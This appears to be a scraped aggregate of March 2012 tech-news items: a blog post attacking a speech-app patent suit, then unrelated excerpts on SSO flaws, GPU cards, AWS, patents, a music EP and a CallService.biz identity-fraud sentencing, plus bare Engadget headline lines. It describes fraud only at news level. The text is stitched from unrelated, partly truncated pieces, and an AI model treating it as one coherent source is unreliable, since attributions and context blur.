I took a quick look at the complaint, Semantic Compaction Systems, Inc. and Prentke Romich Company, v. Speak for Yourself LLC; Renee Collender, an individual; and Heidi Lostracco, an individual, and it is horrifying at several levels. Point 16 says that the key “invention” is this misleadingly complicated paragraph: “A dynamic keyboard includes a plurality of keys, each with an associated symbol, which are dynamically redefinable to provide access to higher level keyboards. Based on sequenced symbols of keys sequentially activated, certain dynamic categories and subcategories can be accessed and keys corresponding thereto dynamically redefined. Dynamically redefined keys can include embellished symbols and/or newly displayed symbols. These dynamically redefined keys can then provide the user with the ability to easily access both core and fringe vocabulary words in a speech synthesis system.”
Strip away the gobbledygook, and this is a patent for using pictures as menus and sub-menus. This is breathtakingly obvious, and was obvious long before this was patented. Indeed, it would have been obvious to most non-computer people. But this is the problem with many software patents; once software patents were allowed (for many years they were not, and they are still not allowed in many countries), it’s hard to figure out where to end.
One slight hope is that there is finally some effort to curb the worst abuses of the patent system. The Supreme Court decided on March 20, 2012, in Mayo v. Prometheus, that a patent must do more than simply state some law of nature and add the words “apply it.” This was a unanimous decision by the U.S. Supreme Court, remarkable and unusual in itself. You would think this would be obvious, but believe it or not, the lower court actually thought this was fine. We’ve gone through years where just about anything could be patented. By allowing software patents and business patents, the Patent and Trademark Office has become swamped with patent applications, often for obvious or already-implemented ideas. Other countries do not allow such abuse, by simply not allowing these kinds of patents in the first place, giving them time to review the rest. See my discussion about software patents for more.
My hope is that these patents are struck down, so that this 3-year-old girl will be allowed to keep her voice. Even better, let’s strike down all the software patents; that would give voice to millions.
Account login services from Google, Facebook, and other commercial providers are prone to flaws that allow adversaries unauthorized access to private user profiles on the third-party Websites that use them, a team of computer scientists has concluded.
Their 10-month study found that many SSO, or single sign-on, services supplied by IdPs, or ID Providers, including Google, Facebook, and PayPal weren't properly integrated into Websites that used the services. As a result, private data on RP, or relying party, sites belonging to Farmville, Freelancer, Nasdaq, Sears, JanRain, and others was vulnerable to snoops.
Inhabitat's Week in Green: supersonic biplane, urban algae farm and magnetic tattoos originally appeared on Engadget on Sun, 25 Mar 2012 20:26:00 EDT.
During the weekend, even Ars takes an occasional break from evaluating third-generation iPads or hypothesizing about Microsoft patents. Weekend Ar(t)s is a chance to share what we're watching/listening/reading or otherwise consuming this week.
Sufjan Stevens is the modern musician for intellectuals. He has the academic background, the intricate orchestral pop, the bevy of nerdy conceptual albums (covering topics from states to holidays, and even bridges). He once included "Decatur" and "Emancipator" within the same rhyme scheme for crying out loud.
Needless to say, news of a new Stevens EP leaked in February and caused much excitement. The project would be a collaborative effort, with Stevens forming a group called s/s/s. That meant initially pairing up with Son Lux, another heavily orchestral indie musician who once wrote an entire album in a single month, and composed for yMusic. No stretch there.
The surprise came from the inclusion of that final "s." It referred to Serengeti—a rapper who happens to share a label with Son Lux. Like many Ars staffers, he calls Chicago home and playfully weaves it into his music. Serengeti's original album referenced things from WCKG to Portillo's. Considering the emcee's affinity for concepts and hyper-referential vocals, perhaps only his musical style would truly be a stretch for Stevens.
Beak & Claw finally debuted this past week and early listens indicate it's a must for any Stevens completionist. Be warned up front: there's no outright orchestral or folk influence here. It's foreign territory for Stevens; a combo of electronica and hip-hop that should raise an eyebrow only on paper. Ultimately these four songs feature all the charming nuances of any of Stevens work, demonstrating that his musical intelligence can transcend genre.
Beak & Claw's first single, "Museum Day," is particularly indicative of this. Serengeti's verse mentions things like "dinosaur museums" and "double, triple dares," while taking a more relaxed tempo than most hip-hop (think Drake in terms of cadence). A very soothing electronic string hook is laid underneath to carry things musically. Stevens blends his own vocals (through vocoder, naturally) with this to create a soundscape verging on ambient. During the chorus when he, accompanied by a familiar choir, vocally soars over a cymbal-heavy percussion beat, it's as genuinely beautiful as anything you'd find on Seven Swans.
The rest of this debut s/s/s effort reaches similar heights (possibly even higher ones, my favorite track is embedded above) and leaves a listener wanting more. It's not the first time Sufjan Stevens has been fused with hip-hop (thank Tor and his Illinoize remixes), but it's the first time he's concocted that marriage on his terms. Stevens has always been willing to challenge himself (ambitions of writing albums for all 50 states for instance), but the work of s/s/s shows he's capable of doing it through composition, not just concept. Here's hoping Beak & Claw isn't the last opportunity for that.
Refresh Roundup: week of March 19th, 2012 originally appeared on Engadget on Sun, 25 Mar 2012 19:14:00 EDT.
Maybe you're a Dropbox devotee. Or perhaps you really like streaming Sherlock on Netflix. For that, you can thank the cloud.
In fact, it's safe to say that Amazon Web Services (AWS) has become synonymous with cloud computing; it's the platform on which some of the Internet's most popular sites and services are built. But just as cloud computing is used as a simplistic catchall term for a variety of online services, the same can be said for AWS—there's a lot more going on behind the scenes than you might think.
If you've ever wanted to drop terms like EC2 and S3 into casual conversation (and really, who doesn't?) we're going to demystify the most important parts of AWS and show you how Amazon's cloud really works.
An electronics dealer in Oakland, California, said he struggled to break even this year, a far cry from previous iPad releases when he shipped upwards of 1,000 tablets and pocketed profits of $50 to $100 per device sent to his buyer in Hong Kong. The other major factor seems to be an abundance of supply and a simultaneous launch in 10 countries including Hong Kong. As a result, black market prices for the new iPad in China have been falling.
Switched On: Tablets are toys. No, really. originally appeared on Engadget on Sun, 25 Mar 2012 17:30:00 EDT.
Take another look at that picture, and think about what you see. What are we looking at, and what’s all that green stuff?
Pretty easy quiz, right? The paint-by-numbers surface of the Earth has become second nature as satellite photos have entered the globalized world’s vernacular: water is blue, and plants are green.
But does this always have to be the case? Is it possible that plants could be red, or purple, or blue? These questions are more than just sci-fi curiosities - they’re becoming increasingly relevant as exoplanet hunters peer at distant planets, now closer than ever before.
Major ISPs agree to FCC's code of conduct on botnets, DNS attacks originally appeared on Engadget on Sun, 25 Mar 2012 16:13:00 EDT.
The Web is a powerful publishing platform, but HTML still has some weaknesses as a medium for presenting written content. Browser vendors and other stakeholders are working to remedy those weaknesses by improving the Web's native support for print-quality typography and text layouts.
Adobe is making significant contributions to that effort. A new set of CSS features for advanced text layouts that Adobe developed and proposed for standardization last year are beginning to gain traction. The company's CSS Regions proposal defines a system for creating magazine-style text layouts in Web content.
Documents submitted to the FCC reveal that Sony is preparing to launch a VAIO laptop with Google's Chrome OS operating system. The new Chromebook has an 11.6-inch display, WiFi and Bluetooth connectivity, USB ports, an HDMI output, and an SD card slot.
Laptop Reviews, which drew attention to the FCC documents this weekend, believes the system may be powered by an ARM-based processor. They note the documents list the CPU as a T25, which could refer to an NVIDIA Tegra 250 T25, an SoC with a dual-core 1.2GHz ARM Cortex-A9. Previous Chromebooks have all used Intel's Atom CPU.
A renovated building in Midtown Atlanta has been awarded 95 out of a possible 110 LEED points for its environmental design - the highest score for any new construction in the Northern Hemisphere.
Though classified as a "New Construction" in the Leadership in Energy and Environmental Design system, 1315 Peachtree Street, Atlanta is actually a 1980s construction that has undergone extensive renovation. But what does LEED certification entail? And is this the greenest building in the Northern Hemisphere?
AT&T Labs, Carnegie Mellon research haptic-feedback steering wheel for turn-by-turn directions originally appeared on Engadget on Sun, 25 Mar 2012 14:56:00 EDT.
High-level executives at Google and Oracle were ordered to hold one last round of settlement talks, with the trial over Google's alleged use of Java technology in Android set to begin April 16.
The suit began in August 2010 when Oracle sued Google for patent and copyright infringement over use of the Java programming language in development of Android. Settlement talks have been ordered multiple times, but so far no deal has been made. On Friday, Judge Paul Grewal of US District Court in Northern California ordered Android chief Andy Rubin and Oracle Chief Financial Officer Safra Catz to hold "a further settlement conference" no later than April 9.
Fourth-grade students from Emily Dickinson Elementary School in Bozeman, Montana won the contest to rename two NASA spacecraft. Their prize? The right to choose which parts of the moon the NASA ships would photograph. The images they chose have now been made available by the space agency.
In a perfect storm of bureaucratic literalism and mythopoetic overstatement, the two crafts were formerly called "Gravity Recovery And Interior Laboratory (GRAIL) A and B." The students won the right to direct the craft's MoonKAM (Moon Knowledge Acquired by Middle school students, seriously?) to photograph their choice by slightly purging NASA of its endemic etymological turgidity. The kids' entry for the crafts' new names: Ebb and Flow.
GRAIL was NASA's first planetary mission devoted to education and is directed by the first American woman in space, Sally Ride. The MoonKAM will be used by 2,700 schools in 52 countries over the course of the mission. NASA hopes direct control over a spacecraft (or a sizable chunk of it anyway—the camera) will, in the minds of a generation of school children, turn the moon from an abstraction into something they feel invested in.
"What might seem like just a cool activity for these kids may very well have a profound impact on their futures," Ride said in NASA's announcement. "The students really are excited about MoonKAM, and that translates into an excitement about science and engineering."
You smell uncomfortable and accident prone: What do we rely on our sense of smell for? A new study attempts to find out by surveying a population of 32 individuals who were born without the ability to detect odors (in jargonese, that's "isolated congenital anosmia"). The answers: those without a functional nose tended to be involved in more household accidents, while experiencing "enhanced social insecurity." For the former, many have adopted coping strategies like asking others to determine whether a container of milk has gone bad.
I'm not sure prison is the right place to be testing gender theories: This is a case where an interesting and potentially useful finding is probably being a bit overinterpreted. Some researchers tracked the incidence of sexual violence in state prisons and found that it was lower in states that allowed their inmates conjugal visits. However, they've attempted to broaden that into some sort of grand conclusion about whether rape is a matter of gender-driven power struggles, which is probably stretching the relevance of the results past their breaking point.
Verdi after organ transplants, Enya for day-to-day life: This one had Weirdness written all over it, starting with the title: "Auditory stimulation of opera music induced prolongation of murine cardiac allograft survival and maintained generation of regulatory CD4+CD25+ cells." Yes, some researchers have honestly subjected mice to a heart transplant, and then subjected them to either plain noise, opera, classical music, or Enya. The ones that got Verdi or Mozart handled their transplant better.
There are two things worth pointing out about this study. The first is that various forms of stress are known to alter immune function, and these mice appear to have gotten the music 24 hours a day for a week. So it's not out of the question that there would be some difference in immune response. The second thing is that, should you have a pretentious friend point to this as evidence of the superiority of opera, point out that a reduced immune response isn't considered a great thing if you haven't just had an organ transplant.
This sounds a bit more involved than the average runner's high: Apparently, it might be time to reinterpret some of the grunting you hear at the gym, as there is a population of women out there who sometimes experience what's being termed an "exercise induced orgasm." Generally, this came during a heavy abdominal workout (a pattern that's apparently earned them the term "coregasm"), although some have also had it while bicycling or hiking. The authors note that the women who get them say they don't generally involve any mental sexual imagery, raising questions about whether there's any necessary connection between the orgasm and sexual activity.
What do Samsung and Phones 4u have to show the UK on March 30th? originally appeared on Engadget on Sun, 25 Mar 2012 12:08:00 EDT.
Harry Potter Wizards Collection brings home all eight movies on a ridiculous 31 discs (video) originally appeared on Engadget on Sun, 25 Mar 2012 10:54:00 EDT.
NRG to bring 200 fast-charging EV stations to the Golden State, pump $100 million into CA infrastructure originally appeared on Engadget on Sun, 25 Mar 2012 07:35:00 EDT.
Sky Anytime+ now available via all broadband providers originally appeared on Engadget on Sun, 25 Mar 2012 04:22:00 EDT.
“Everyone’s scrambling to get something into place,” said Victor Rubba, chief executive of Fluik, a Canadian developer that makes games like Office Jerk and Plumber Crack. “We’re trying to be proactive and we’ve already moved to an alternative scheme.” Rubba said he isn’t sending any updates until he sees how the situation shakes out in the next few days. The reason for the phasing out of UDIDs from developer use is increased pressure on Apple over the privacy implications. Apple and several app developers have been sued over the use of the UDID to track users across different apps. While the UDID doesn't specifically identify a user, the sharing of UDIDs across ad networks and apps can help piece together a valuable picture of the activity and interests of a specific device's user. Apple seems to be requiring apps to generate their own unique identifiers for each installation to avoid this ability to share such information across apps.
Could Fido be joining the Canadian LTE club? originally appeared on Engadget on Sun, 25 Mar 2012 00:57:00 EDT.
"Hi guys. I'm getting married in a church with a weird split-hall design. The result is that half of the attendees won't be able to see the ceremony at all! I'm wondering if I could hook my Canon Rebel T3i up to my 3rd-generation iPad and use it as a quick-and-dirty closed-circuit display? There's no WiFi in the location, so it has to be a wired solution too. Please help me!"
It's an interesting request and that's why we're here: solving those problems that three minutes on Google just can't. So, dear friends, what say you? Wish the soon-to-be-wed couple all the best by adding a helpful solution to the comment feed and spread a little joy.
Ask Engadget: using an iPad as a remote viewfinder? originally appeared on Engadget on Sat, 24 Mar 2012 22:55:00 EDT.
If the numbers are true, then most of you have already read our Kepler review, and you know that the card has made quite a splash - it's the highest-performing single-GPU card you can buy today, and it's got solid power consumption and a lower price than the AMD Radeon HD 7970 to boot. Kepler still needs to trickle down through the rest of NVIDIA's lineup, but for now NVIDIA has the high-end sewn up. Let's look at what its partners have put together.
 | ASUS | EVGA | Galaxy | Gigabyte
Part Number | GTX680-2GD5 | 02G-P4-2680-KR | 68NPH6DV5ZGX | GV-N680D5-2GD-B |
Core Clock | 1006 MHz | 1006 MHz | 1006 MHz | 1006 MHz |
Memory Clock (Effective) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) |
Boost Clock | 1058 MHz | 1058 MHz | 1058 MHz | 1058 MHz |
Dimensions in inches (dimensions in mm) | 10.08 x 4.37 x 1.47 (256.03 x 111.00 x 33.34) | 10 x 4.38 x ?? (254 x 111.25 x ??) | 10 x 4.33 x 1.57 (254 x 109.98 x 39.88) | 10.83 x 4.96 x 1.50 (275 x 126 x 38) |
Outputs | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D |
Included accessories | 4-pin to 6-pin | DVI to VGA, 2x 4-pin to 6-pin | 2x DVI to VGA, 2x 4-pin to 6-pin | 2x 4-pin to 6-pin |
Warranty | 3-year | 3-year | 3-year | 3-year |
Price (Newegg) | $499.99 | $499.99 | $499.99 | $499.99 |
 | MSI | PNY | Zotac
Part Number | N680GTX-PM2D2GD5 | VCGGTX680XPB | ZT-60101-10P |
Core Clock | 1006 MHz | 1006 MHz | 1006 MHz |
Memory Clock (Effective) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) | 1502 MHz (6008 MHz) |
Boost Clock | 1058 MHz | 1058 MHz | 1058 MHz |
Dimensions in inches (dimensions in mm) | 10.63 x 4.38 x 1.53 (270 x 111.15 x 38.75) | ??? | 11.10 x 4.9 x 2.3 (281.9 x 124.46 x 58.42) |
Outputs | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D | DisplayPort, HDMI, DVI-I, DVI-D |
Included accessories | DVI to VGA, 4-pin to 6-pin | DVI to VGA, 4-pin to 6-pin, HDMI cable | DVI to VGA, 2x 4-pin to 6-pin |
Warranty | 3-year parts/2-year labor | 1-year (Lifetime with registration) | 2-year |
Price (Newegg) | $499.99 | $529.99 | $499.99 |
As we've noted in past recaps, you should take these card measurements with a grain or two of salt. Manufacturers haven't standardized on a unit of measurement for their cards - some measure in inches and some in metric. I've done the necessary conversions and presented all measurements in both inches and millimeters, but manufacturers play a bit loose with these measurements and the actual physical dimensions may not exactly match the dimensions given on the spec sheet.
Common to all of these cards is 2GB of GDDR5 on a 256-bit bus and all of Kepler's features - in fact, most of these cards have pretty much everything in common with one another, from the across-the-board stock clocks to the display outputs to the single-fan, dual-slot coolers to the lackluster bundles of accessories. This isn't uncommon with high-end launches of all-new architectures - we saw the same thing happen in our Radeon HD 7970 launch recap, another crop of cards that stuck to the reference design.
As such, there's not a ton to say about them, so I'll just make notes below when there's something about the card that makes it different from the stock card that we reviewed a couple of days ago.
MSI's graphics cards usually have a 3-year parts and 2-year labor warranty, and this card is no exception.
This card is the only one in the lineup that costs more than $500, and there are a couple of reasons why: one is the lifetime warranty you can get by registering the card, and the other is the bundled HDMI cable. It's the only card in the lineup with anything more than power cables and DVI to VGA adapters. It's also the only card for which I can't find measurements (Amazon lists the length at eight inches, which I find suspect since the rest of the cards are at least ten). The card's dimensions should be similar to the others.
Zotac's is the only card in this lineup with a 2-year warranty instead of the 3-year warranty shared by most of the rest of them.
Instagram opens signup page for Android port, release date still unknown originally appeared on Engadget on Sat, 24 Mar 2012 20:41:00 EDT.
It has been a couple of weeks since we reviewed the Radeon HD 7800 series, but as we mentioned earlier this week and in our 7850 recap, that was just a paper launch - the cards hit the street only recently, and as usual we're going to go through all of the stuff from AMD's partners and give you the Facts.
 | ASUS | Gigabyte | MSI | PowerColor
Part Number | HD7870-DC2-2GD5 | GV-R787OC-2GD | R7870 Twin Frozr 2GD5/OC | AX7870 2GBD5-2DH
Core Clock | 1010 MHz | 1100 MHz | 1050 MHz | 1000 MHz |
Memory Clock (Effective) | 1210 MHz (4840 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) |
Dimensions in inches (dimensions in mm) | 10.16 x 5.12 x 1.7 (258.06 x 130.05 x 43.18) | 11.02 x 5.28 x 1.67 (280 x 134 x 42.5) | 10.63 x 4.65 x 1.65 (270 x 118 x 42) | 9.5 x 4.38 x 1.50 (241.3 x 111.2 x 38) |
Outputs | 2x Mini DisplayPort, HDMI, DVI-I | 2x Mini DisplayPort, HDMI, DVI-I | 2x Mini DisplayPort, HDMI, DVI-I | 2x Mini DisplayPort, HDMI, DVI-I |
Included accessories | DVI to VGA adapter, 6-pin extension cable, Crossfire bridge | 2x 4-pin to 6-pin, Crossfire bridge | Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge | DVI to VGA, Mini DP to DP, HDMI to DVI |
Warranty | 3-year | 3-year | 3-year parts/2-year labor | 2-year |
Price (Newegg) | $359.99 | $359.99 | $369.99 | $359.99 |
 | PowerColor PCS+ | Sapphire | Sapphire OC
Part Number | AX7870 2GBD5-2DHPP | 11199-00-20G | 11199-03-20G
Core Clock | 1100 MHz | 1000 MHz | 1050 MHz |
Memory Clock (Effective) | 1225 MHz (4900 MHz) | 1200 MHz (4800 MHz) | 1250 MHz (5000 MHz) |
Dimensions in inches (dimensions in mm) | 9.5 x 4.38 x 1.50 (241.3 x 111.2 x 38) | 10.24 x 4.45 x 1.38 (260 x 113 x 35) | 10.24 x 4.45 x 1.38 (260 x 113 x 35) |
Outputs | 2x Mini DisplayPort, HDMI, 2x DVI-I | 2x Mini DisplayPort, HDMI, DVI-I | 2x Mini DisplayPort, HDMI, DVI-I |
Included accessories | DVI to VGA, Mini DP to DP, Crossfire bridge | DVI to VGA, Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge | DVI to VGA, Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge |
Warranty | 2-year | 2-year | 2-year |
Price (Newegg) | $369.99 | $349.99 | $359.99 |
As we've noted in past recaps, you should take these card measurements with a grain or two of salt. Manufacturers haven't standardized on a unit of measurement for their cards - some measure in inches and some in metric. I've done the necessary conversions and presented all measurements in both inches and millimeters, but manufacturers play a bit loose with these measurements and the actual physical dimensions may not exactly match the dimensions given on the spec sheet.
Common to all of these cards is 2GB of GDDR5 on a 256-bit bus, Eyefinity support, two 6-pin power connectors, and all of GCN's features. All but one of the cards also offer identical outputs: two mini DisplayPorts, one HDMI port, and one DVI-I port. The PowerColor PCS+ card also offers a second DVI-I output.
ASUS again uses its DirectCUII cooler on its 7870 - this cooler has made appearances in many of our other launch recaps, including that for the 7850, where the cooler was actually a good bit longer than the card itself. Since the 7870 is a longer card, that isn't an issue here. As with its 7850, ASUS applies a paltry 10MHz overclock to the core and the memory, but the bundled accessories are nothing to write home about - the biggest reason to choose this card over others is the 3-year warranty.
Gigabyte's 7870 employs a massive three-fan cooler, the better to cool its 100MHz (10%) core overclock, which is the highest clock in our recap - it's tied with one of the PowerColor cards, and while that one is $10 more expensive, it also has a slight memory overclock. The Gigabyte card's memory remains at stock clocks - if you've been following these recaps for a while, you've probably noticed that factory overclocks tend to focus on the core rather than the memory - only three of the seven cards here have memory overclocks, and none of them are higher than 4%.
Like many of the cards here, MSI's 7870 has a two-fan cooler with a big heatsink, but otherwise it has a hard time distinguishing itself from the crowd - it's tied for the most expensive card, but it has only a modest 50MHz core overclock and a three-year parts and two-year labor warranty that falls in the middle of the rest of the pack.
As is often the case in these recaps, both PowerColor and Sapphire are offering two versions of the 7870, one with stock clocks and a slightly more expensive model with a factory overclock. This is the stock clocked version, and it's the only card in this lineup that uses AMD's reference cooler for the 7870 series.
This PowerColor card is $10 more expensive than its lower-end cousin, but it comes with a 100MHz core overclock and 25MHz memory overclock that should net you an increase in frames per second. It's also the only card here with a second DVI port, which it adds to the 7870's standard complement of Mini DisplayPorts and HDMI. If you value warranty length over factory overclocks, though, this one only has a two-year warranty to its name.
This card has the same stock clocks and 2-year warranty as the PowerColor card, but it's $10 cheaper (the cheapest card in the recap), includes a better accessory bundle, and uses a two-fan cooler with a more impressive heatsink.
This card is identical to the other Sapphire offering in almost every way - the warranty, included accessories, and cooler are all the same. Your extra $10 gets you a 50 MHz overclock on both the core and the memory - if you're not comfortable doing your own overclocks, you can spend the extra $10 and get a few frames per second for it. If you do your own overclocks, save the cash.
XBMC Eden officially steps out of beta, available for download now
It has been weeks since we reviewed AMD's Radeon HD 7870 and 7850 cards; unlike the 7900 and 7700 series cards, the 7800 series was given the typical middle-child treatment and paper launched, with cards only beginning to appear at retailers this week.
Kepler's launch has cast a long shadow over the top end of the graphics market (a GTX 680 recap is coming later today, don't worry), but competition is still fierce, and as we noted in our review, the 7850 is a solid performer and the fastest 150-watt card on the market today. Let's look at what AMD's partners have for us.
ASUS | Gigabyte | HIS | MSI | PowerColor | Sapphire |
Part Number | HD7850-DC2-2GD5 | GV-R785OC-2GD | H785F2G2M | R7850 Twin Frozr 2GD5/OC | AX7850 2GBD5-2DH | 11200-01-20G |
Core Clock | 870 MHz | 975 MHz | 860 MHz | 900 MHz | 860 MHz | 920 MHz |
Memory Clock (Effective) | 1210 MHz (4840 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) | 1200 MHz (4800 MHz) | 1250 MHz (5000 MHz) |
Dimensions in inches (dimensions in mm) | 10.2 x 4.5 x 1.7 (259.08 x 114.3 x 43.18) | 9.49 x 5.39 x 1.67 (241 x 137 x 42.5) | ??? | 7.76 x 4.37 x 1.50 (197 x 111 x 38) | 7.99 x 4.37 x 1.50 (203 x 111 x 38) | 8.27 x 4.13 x 1.38 (210 x 105 x 35) |
Included accessories | DVI to VGA, Crossfire bridge | 4-pin to 6-pin, Crossfire bridge | DVI to VGA, Crossfire bridge | DVI to VGA, Mini DP to DP, 2x 4-pin to 6-pin, Crossfire bridge | DVI to VGA, Mini DP to DP, HDMI to DVI | DVI to VGA, Mini DP to DP, 4-pin to 6-pin, Crossfire bridge |
Warranty | 3-year | 3-year | 2-year | 3-year parts/2-year labor | 2-year | 2-year |
Price (Newegg) | $259.99 | $259.99 | $259.99 | $259.99 | $259.99 | $259.99 |
As we've noted in past recaps, you should take these card measurements with a grain or two of salt. Manufacturers haven't standardized on a unit of measurement for their cards - some measure in inches and some in metric. I've done the necessary conversions and presented all measurements in both inches and millimeters, but manufacturers play a bit loose with these measurements and the actual physical dimensions may not exactly match the dimensions given on the spec sheet.
Common to all of these cards are 2GB of GDDR5 on a 256-bit bus, Eyefinity support, and all of GCN's features. All cards also offer identical outputs: two mini DisplayPorts, one HDMI port, and one DVI-I port. Normally we see a range of prices from different manufacturers due to factory overclocks, longer warranties, or included accessories, but in this case we've got identical prices across the board, which makes an apples-to-apples comparison among cards much easier. As long as you don't have any particular brand loyalty, just pick the one with the value-added extras you need the most.
The ASUS 7850 features a 10MHz overclock on both the GPU and the RAM, but it's so small that it won't increase framerates much at all over stock clocks. Its bundle of accessories is pretty sparse, but its 3-year warranty is tied with the Gigabyte card for the longest of the bunch.
This ASUS card's defining characteristic is the DirectCUII cooler, a huge two-fan cooler that was actually designed for longer cards like the Radeon HD 7950. On the shorter 7850, it hangs over the end of the card by quite a bit, requiring the use of an extension cord to make the 6-pin power connection accessible. This move may make the GPU cooler (and, by extension, get you a better overclock), but it will also require a larger case.
The Gigabyte card has a bit in common with the ASUS card - a big fancy two-fan cooler, a 3-year warranty, a bare accessory bundle - but it's a bit shorter in length, and it features an impressive 115MHz (about 12%) overclock on the core, which should actually net you a measurable increase in game performance. The memory clock, however, is left at stock.
Here's a first in AnandTech Graphics Card Launch Recap History: the dimensions for this HIS card aren't available through Newegg or HIS's product page, or anywhere else that I can find (the product page gives "box dimensions", which is useful if you're shipping the card but not if you're using it). Luckily, its humdrum single-fan cooler means that the card should be unremarkable in this regard - I'd guess it should be close to eight inches long.
Otherwise, HIS doesn't give you much in terms of value-adds - it uses stock clocks, the two-year warranty is the minimum I like to see on components that cost this much, and the DVI to VGA adapter and Crossfire bridge constitute a pretty small accessory bundle.
With the MSI card, we're back to custom two-fan coolers and big heatsinks. A 40MHz (~4.5%) core overclock is respectable but small, and it uses stock memory clocks. A 3-year parts and 2-year labor warranty splits the difference between the longest and shortest warranties on the list.
Where MSI beats the competition is in its accessory bundle, which is actually worthy of the name - in addition to basics like power cable adapters (the Newegg product image appears to include two of these, though it only has the one six pin power plug on the back) and a DVI to VGA adapter, it also includes a Mini DisplayPort to DisplayPort adapter.
The PowerColor card is a lot like the HIS model in its single-fan cooler, 2-year warranty, and stock clocks, but it adds some useful display adapters to the package. PowerColor's card is the only one here that's using AMD's reference cooler for the 7850 series (visible on this page of our review).
Sapphire's take on the 7850, which uses another big two-fan cooler, is the only one in the list with a memory overclock worthy of the name. The 50MHz (4%) RAM overclock along with the 60MHz (6.5%) core overclock should give you a noticeable increase in framerates if you're not comfortable doing your own overclocking. Other benefits include the respectable accessory bundle; drawbacks include the shorter 2-year warranty.
Mobile Miscellany: week of March 19th, 2012
World's largest telescope underway, scientists definitely observe big bang
Ars Technica's beginnings are rooted in a community that has always tinkered, built, and modded computer hardware. As it has evolved, the do-it-yourself philosophy has also triggered other communities that make their own stuff. Most recently, the "make movement" has made a name for itself in the world of open source hardware and hacking. The movement covers a broad range of interests, edging into some hardcore do-it-yourself projects. Some groups meet in hackerspaces, but the movement at large seems mostly based on the spirit of building things yourself or with other people.
A Belarusian who operated a rent-an-accomplice business for bank thieves has been sentenced to 33 months in prison in New York.
Dmitry Naskovets pleaded guilty to operating CallService.biz, a Russian-language site for identity criminals who trafficked in stolen bank-account data and other information.
Naskovets was arrested in 2010 in the Czech Republic at the request of US authorities and subsequently extradited to the US. A co-conspirator named Sergey Semashko was arrested the same day in Belarus and has been charged there.
According to authorities, the two launched their site in Lithuania in June 2007 and filled a much-needed niche in the criminal world—providing English- and German-speaking "stand-ins" to help crooks thwart bank security screening measures.
In order to conduct certain transactions—such as initiating wire transfers, unblocking accounts or changing the contact information on an account—some financial institutions require the legitimate account holder to authorize the transaction by phone.
Thieves could provide the stolen account information and biographical information of the account holder to CallService.biz, along with instructions about what needed to be authorized. The biographical information sometimes included the account holder’s name, address, Social Security number, e-mail address and answers to security questions the financial institution might ask, such as the age of the victim’s father when the victim was born, the nickname of the victim’s oldest sibling, or the city where the victim was married.
More than 2,000 identity thieves used the service to commit more than 5,000 acts of fraud, according to authorities.
"Through his website, Dimitry Naskovets served as the middleman for a network of identity thieves who used his many employees to impersonate thousands of victims in exchange for a stake in the profits from the fraudulent transactions they helped facilitate," Manhattan US Attorney Preet Bharara said in a statement. "This case is another example of how cybercrime knows no geographic boundaries and of how we will work with our partners in the United States and around the world to catch and punish cyber criminals."
The thieves obtained the information through phishing attacks and malware placed on victims’ computers to log their keystrokes.
CallService.biz would then assign someone who matched the legitimate account holder’s gender and was proficient in the needed language. That person would pose as the account holder and call the financial institution to authorize the fraudulent transaction.
Marketers, when they hit, can identify the seed of a product, service or organization and plant it in fertile soil where it will grow like mad. They can tease out the implications of the object they're charged with publicizing or find the motif that others are most likely to riff on. But when they fail, they can fail in the most mortifying fashion. All around the country, the marketing staff at live performance spaces big and small are embracing the "youthquake" in the grooviest way I've seen in years. They are offering up "tweet seats" to the kids.
It is an operatically stupid idea.
Chrome OS coming to ARM?
AOL, a company that’s been struggling with shrinking sales over the last several years, may be looking for new sources of income. According to Bloomberg, “three people with knowledge of the matter” said the company is hiring investment firm Evercore to find buyers or licensees for some of its more than 800 patents. The three sources also said Evercore would “explore other strategic options” for the company, without going into more detail.
Since 2009, when AOL separated from media content giant Time Warner, the web company has seen a 29 percent drop in revenue, according to Bloomberg. Part of this could be due to the ever-diminishing returns of AOL’s once ubiquitous dial-up service (subscription revenue from AOL's dial-up dropped 18 percent from 2010 to 2011). Earlier this month, AOL cut more than 40 employees from AIM, their Instant Messenger department.
The three anonymous sources also said that several private-equity firms have recently approached AOL about privatizing the company and buying out its shareholders, but that AOL has not yet made a deal with any other company. AOL’s CEO Tim Armstrong has said publicly that he would be open to going private, and was in talks with Yahoo as early as September, although no deal was initiated then, either.
Investment bank MDB Capital Group said licensing some of its patents could earn AOL as much as $1 billion in licensing fees. A quick search of AOL’s patents reveals such prime intellectual property as “e-mail integrated instant messaging,” which is included in most e-mail clients these days; a patent for “host-based intelligent results related to a character stream,” much like Google search’s auto-complete; and a “system for automated translation of speech,” similar to a system developed by Microsoft and shown off earlier this year. Large companies like Google and Microsoft might be potential buyers for such patents, either to prevent infringement claims against alternative ways of developing products similar to theirs or simply to avoid patent lawsuits down the road.
Evercore has been hired by companies like McGraw Hill, mortgage insurer PMI, and the airline Northwest Air, to find buyers for portions of the companies or to assist with restructuring.
Bowing to pressure from travelers, the FAA has decided to "revisit" the de facto ban on the use of gadgets during take-off and landing. Depending on the outcome of this re-examination of the rules, the future may well allow us to remain glued to our screens for an extra fifteen minutes at each end of a flight. But is this really a future we should be welcoming?
While nothing will change in the immediate future, this "revisit" opens the door to end-to-end gadgetry: if the rules change we will be glued to our screens from the moment we first take our undersized and uncomfortable seats right until the time the pod bay doors are opened and we escape our flying sardine cans.
I think this is a step backwards, and that the pressure that the FAA is under is a sad reflection on modern life.
Apogee MiC review
The new UI shouldn’t come as a surprise to anyone. There is a clear effort at Apple to make everything match the look and feel of their popular iOS products – starting with Lion and increasing momentum with Mountain Lion.
To be clear – he didn’t like the original grid. This was before the iPhone was popular and before the iPad even existed.
Given that the iPad is far more successful than the AppleTV, migrating the AppleTV to look more like the iPad was probably a very smart move – even if some of the users of the old UI don’t prefer the new one.
